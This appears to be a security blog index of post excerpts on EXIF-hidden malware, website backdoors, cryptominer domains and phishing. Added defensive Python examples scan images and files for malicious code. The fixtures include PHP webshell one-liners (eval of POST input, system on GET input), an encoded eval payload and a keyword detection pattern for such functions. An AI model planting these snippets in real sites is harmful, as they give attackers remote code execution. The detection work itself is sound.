- Hiding Malware Inside Images on GoogleUserContent 18 July 2018
If you have been following our blog for a long time, you might remember us writing about malware that used EXIF data to hide its code.
This technique is still in use. Let us show you a recent example.
This code was found at the beginning of a malicious script that steals PayPal security tokens.
As you can see, it reads “EXIF data” from a pacman.jpg image hosted on Google’s servers, probably uploaded using a Blogger or Google+ account.
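The loader only has to call something like PHP's exif_read_data() on a file that looks like an ordinary picture, so the image is where a scanner needs to look. As an added example (not code from the Sucuri post and not the pacman.jpg sample it describes), the following Python parses the Exif APP1 segment of a JPEG with the standard library only and flags ASCII tags whose contents look like PHP code. The sample image is built in the script; its field values and the list of suspicious tokens are assumptions chosen to illustrate the technique, not data taken from the post.

```python
import re
import struct

# IFD0 tags holding free-form ASCII; these are where hidden code tends to live.
ASCII_TAGS = {0x010E: "ImageDescription", 0x010F: "Make", 0x0110: "Model",
              0x0131: "Software", 0x013B: "Artist", 0x8298: "Copyright"}

# Tokens that have no business in a camera or vendor field (assumed list).
SUSPICIOUS = re.compile(
    r"<\?php|eval\s*\(|base64_decode|preg_replace|assert\s*\(|system\s*\(|"
    r"passthru|shell_exec|gzinflate|str_rot13|/\.\*/e", re.IGNORECASE)


def build_jpeg_with_exif(fields):
    """Construct a minimal JPEG whose Exif APP1 segment carries the given
    {tag_id: text} entries in IFD0 (big-endian TIFF). Fixture only: it has
    no image data and is not a valid photo."""
    n = len(fields)
    ifd_offset = 8                                   # right after the TIFF header
    data_offset = ifd_offset + 2 + 12 * n + 4        # after entries + next-IFD pointer
    entries, data = b"", b""
    for tag, text in sorted(fields.items()):
        value = text.encode() + b"\x00"              # Exif ASCII is NUL-terminated
        if len(value) <= 4:                          # short values are stored inline
            entries += struct.pack(">HHI4s", tag, 2, len(value), value.ljust(4, b"\x00"))
        else:                                        # long values live past the IFD
            entries += struct.pack(">HHII", tag, 2, len(value), data_offset + len(data))
            data += value
    tiff = (b"MM\x00\x2a" + struct.pack(">I", ifd_offset)
            + struct.pack(">H", n) + entries + struct.pack(">I", 0) + data)
    body = b"Exif\x00\x00" + tiff
    return b"\xff\xd8" + b"\xff\xe1" + struct.pack(">H", len(body) + 2) + body + b"\xff\xd9"


def read_exif_ascii(jpeg):
    """Walk the marker segments before the scan data, find the Exif APP1
    segment and return {tag_name: text} for every ASCII entry in IFD0."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(jpeg):
        if jpeg[pos] != 0xFF:
            raise ValueError("corrupt marker at offset %d" % pos)
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):                   # EOI / SOS: no more headers
            break
        seg_len = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        body = jpeg[pos + 4:pos + 2 + seg_len]
        pos += 2 + seg_len
        if marker == 0xE1 and body.startswith(b"Exif\x00\x00"):
            return _parse_ifd0_ascii(body[6:])
    return {}


def _parse_ifd0_ascii(tiff):
    order = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if order is None:
        raise ValueError("bad TIFF byte order")
    ifd = struct.unpack(order + "I", tiff[4:8])[0]
    count = struct.unpack(order + "H", tiff[ifd:ifd + 2])[0]
    out = {}
    for i in range(count):
        e = ifd + 2 + 12 * i
        tag, typ, n = struct.unpack(order + "HHI", tiff[e:e + 8])
        if typ != 2:                                 # 2 == ASCII; skip everything else
            continue
        if n <= 4:
            raw = tiff[e + 8:e + 8 + n]
        else:
            off = struct.unpack(order + "I", tiff[e + 8:e + 12])[0]
            raw = tiff[off:off + n]
        out[ASCII_TAGS.get(tag, "0x%04X" % tag)] = raw.rstrip(b"\x00").decode("latin-1")
    return out


def scan_exif_for_code(jpeg):
    """Return [(tag, text)] for Exif text fields that look like PHP code."""
    return [(tag, text) for tag, text in read_exif_ascii(jpeg).items()
            if SUSPICIOUS.search(text)]


# Constructed sample (assumed contents, not the post's pacman.jpg): one benign
# field and two fields carrying the kind of payload that exif_read_data() would
# hand back to a loader script.
SAMPLE = build_jpeg_with_exif({
    0x0131: "GIMP 2.10",
    0x010F: "/.*/e",
    0x0110: "eval(base64_decode('cGhwaW5mbygpOw=='));",
})

if __name__ == "__main__":
    for tag, text in scan_exif_for_code(SAMPLE):
        print("suspicious Exif %s: %s" % (tag, text))
```

Run it over an uploads directory by reading each file's bytes into scan_exif_for_code(); a hit is not proof on its own, but a vendor field containing eval or base64_decode deserves a look at whatever script fetches that image.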
- Persistent Malicious Redirect Variants 16 July 2018
It’s always nice to meet an old friend or someone you used to know well. You have news to share and talk about, stories to tell, etc. But what if your “old friend” was on the criminal side of things and you are meeting him more often than you actually like? Moreover, when you see him, he keeps changing his appearance with different sunglasses, haircuts, beards, and mustaches. But you know it’s still him. And you know he’s still a criminal…
This describes exactly the case of a family of malicious injectors and redirects we have been seeing for several years.
- Ask Sucuri: How Do You Find Website Backdoors? 11 July 2018
In a previous post, we explained what website backdoors are and what they look like. Today, we want to focus on the ways we identify and remove backdoors to prevent reinfection.
Techniques to Find Backdoors
Finding a website backdoor is not an easy task, because a backdoor is built to stay hidden from the website owner. At Sucuri, we recommend the following techniques:
We know what good files look like.
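Knowing what good files look like means having a trusted baseline to compare against. As an added example (not Sucuri's tooling), the following Python takes a manifest of known-good file hashes, diffs the live tree against it, and separately flags PHP files in directories where executable code does not belong. The fake site it builds and the "infection" it applies are constructed fixtures; the directory names are assumptions modelled on a WordPress layout.

```python
import hashlib
import os
import tempfile

# Places where a PHP file is almost never legitimate on a WordPress install
# (assumed list; adjust for the platform you are checking).
NO_PHP_DIRS = ("wp-content/uploads/", "wp-content/cache/")


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Return {relative_posix_path: sha256} for every regular file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_of(full)
    return manifest


def diff_against_baseline(baseline, current):
    """Classify files relative to a known-good manifest. Added or modified PHP
    files are the first candidates for a backdoor; missing files can mean an
    attacker replaced or removed something."""
    return {
        "added": sorted(p for p in current if p not in baseline),
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "missing": sorted(p for p in baseline if p not in current),
    }


def php_in_no_php_dirs(current):
    """Executable code under upload/cache directories is suspicious on its own,
    even when no baseline is available."""
    return sorted(p for p in current
                  if p.lower().endswith(".php") and p.startswith(NO_PHP_DIRS))


def _write(root, rel, text, mode="w"):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, mode) as f:
        f.write(text)


def build_demo_site():
    """Constructed fixture: a tiny fake site, its clean baseline, then an
    'infection' that drops a new file and appends code to an existing one."""
    root = tempfile.mkdtemp(prefix="site-")
    _write(root, "index.php", "<?php require 'wp-blog-header.php';\n")
    _write(root, "wp-includes/functions.php", "<?php function wp_demo() {}\n")
    _write(root, "wp-content/uploads/2018/07/logo.png", "not really a PNG\n")
    baseline = snapshot(root)
    _write(root, "wp-content/uploads/2018/07/.cache.php", "<?php @eval($_POST['x']);\n")
    _write(root, "wp-includes/functions.php",
           "if (isset($_GET['q'])) { system($_GET['q']); }\n", mode="a")
    return root, baseline


if __name__ == "__main__":
    root, baseline = build_demo_site()
    current = snapshot(root)
    for kind, paths in diff_against_baseline(baseline, current).items():
        for p in paths:
            print("%-8s %s" % (kind, p))
    for p in php_in_no_php_dirs(current):
        print("php-in-uploads", p)
```

For real WordPress core files the baseline does not have to be your own snapshot: WP-CLI's `wp core verify-checksums` compares the install against the checksums WordPress publishes for that release. Themes, plugins and anything under wp-content still need a snapshot taken while the site was known to be clean.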
- WordPress Update – 4.9.7 Security & Maintenance Release 5 July 2018
The WordPress team has just released a critical security and maintenance update to resolve a number of bugs and security issues.
Included in this release is a patch for a vulnerability that allows bad actors to delete files from your site. Under certain circumstances, this vulnerability may be enough for an attacker to take complete control of your website.
Are You at Risk?
If you are running WordPress 4.9.6 or earlier, which is likely if you don’t have automatic updates enabled, your site may be vulnerable to this security issue, originally reported by Slavco.
- CoinImp Cryptominer and Fully Qualified Domain Names 5 July 2018
We are all familiar with the conventional domain name notation, where different levels are concatenated with the full stop character (period).
For example, in “www.example.com”, “www” is a subdomain, “example” is the second-level domain, and “com” is the top-level domain.
However, few people know that there is also a DNS root domain, written as an empty label after a trailing dot, so a fully qualified domain name can also be spelled “www.example.com.” and still resolve to the same host.
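The excerpt stops here, before the post relates this to CoinImp. One consequence worth knowing is that “www.example.com” and “www.example.com.” resolve to the same host but are different strings, and browsers treat them as distinct origins, so any filter that compares hostnames byte for byte misses the dotted form. The following Python, added here as an example and not code from the post, shows a naive matcher beside one that normalizes the hostname first; the blocklist entries and URLs are constructed.

```python
from urllib.parse import urlsplit

# Constructed blocklist of hostnames known to serve a miner (assumed names).
BLOCKLIST = {"miner.example.com", "stats.example.net"}


def naive_is_blocked(host, blocklist):
    """Exact string match, the way a hastily written filter often does it."""
    return host.lower() in blocklist


def normalize_host(host):
    """Canonical form for comparison: trim whitespace, lowercase, strip the
    trailing dot that names the DNS root, and IDNA-encode non-ASCII labels."""
    host = host.strip().lower().rstrip(".")
    return host.encode("idna").decode("ascii")


def is_blocked(host, blocklist):
    """Match the normalized host and every parent domain, so blocking
    'example.com' also blocks 'cdn.example.com' and 'example.com.'."""
    labels = normalize_host(host).split(".")
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))


def host_of(url):
    """Hostname as a browser would extract it, trailing dot included."""
    return urlsplit(url).hostname or ""


# Constructed script URLs of the kind a content filter would be asked about.
SAMPLE_URLS = [
    "https://miner.example.com/lib/miner.js",
    "https://miner.example.com./lib/miner.js",      # same host, FQDN with root dot
    "https://MINER.Example.COM./lib/miner.js",
    "https://cdn.miner.example.com/lib/miner.js",
    "https://example.com/lib/app.js",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        h = host_of(url)
        print("%-45s naive=%-5s normalized=%s"
              % (url, naive_is_blocked(h, BLOCKLIST), is_blocked(h, BLOCKLIST)))
```

The same normalization belongs wherever a hostname is used as a key: allowlists, CSP source matching you do server-side, and log correlation, where the dotted and undotted forms would otherwise show up as two different sites.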
- Google and Facebook Used in Phishing Campaigns 3 July 2018
We’ve all seen sketchy-looking emails or texts with malicious links to click on. Some people still fall for these obvious scams, but phishing messages are designed to deceive: they imitate legitimate senders or manufacture urgency to encourage the victim to hand over their data.
Phishing attempts happen in many ways, such as:
- deceptive email campaigns,
- suspicious SMS alerts (called smishing),
- fake websites designed to look and sound authentic, and more.
- Sucuri Enhances Security by Disabling TLS Version 1.0 and 1.1 29 June 2018
Protecting our users’ information and privacy is extremely important to us. As a cloud-based security service, we are fully committed to complying with the PCI Data Security Standard (PCI DSS) requirements, which set June 30, 2018 as the deadline for migrating off SSL and early TLS. That is why Sucuri disabled support for TLS versions 1.0 and 1.1 on our WAF/CDN edge nodes on June 28, 2018.
What Is TLS?
Transport Layer Security (TLS) is a cryptographic protocol that secures a communication channel by authenticating the server and encrypting and integrity-protecting the traffic between the parties involved.
- What are Website Backdoors? 26 June 2018
When a site gets compromised, the attackers will often leave some piece of malware behind to allow them access back to the site. Hackers want to leave a door open to retain control of the website and to reinfect it continuously. This type of malware is called a backdoor.
What Are Backdoors?
Backdoors are a type of malware that gives attackers remote control of a compromised website while bypassing its normal authentication.
- Why You Should Care about Website Security on Your Small Site 21 June 2018
Most people assume that if their website has been compromised, an attacker must have studied their site, looking for a specific vulnerability to exploit.
Under most circumstances however, bad actors don’t manually hand-pick websites to attack since it’s a tedious and time consuming process. Instead, they rely on automation to identify vulnerable websites and execute their attacks. The unfortunate reality is that websites big or small are targeted daily and the majority of these attacks are automated.
- Magento Credit Card Stealer Reinfector 19 June 2018
In the past few months, we have frequently seen attackers infecting Magento installations to scrape confidential information such as credit cards, logins, and PayPal credentials, which is why we recently reported on a credit card stealer reinfector for Magento websites in one of our Labs Notes.
In this post, we describe one of the methods hackers use to ensure that their malicious code is added back to a website after it has been removed.
- The Importance of Website Backups 14 June 2018
Imagine waking up in the morning to see that you missed a couple of calls and your inbox is overloaded with messages saying that your website is down. You go to your computer to check your server, and it’s working fine, but all of your site’s files and database content are gone. What would you do?
Backing up everything may seem like a boring task, but website backups can be a lifesaver.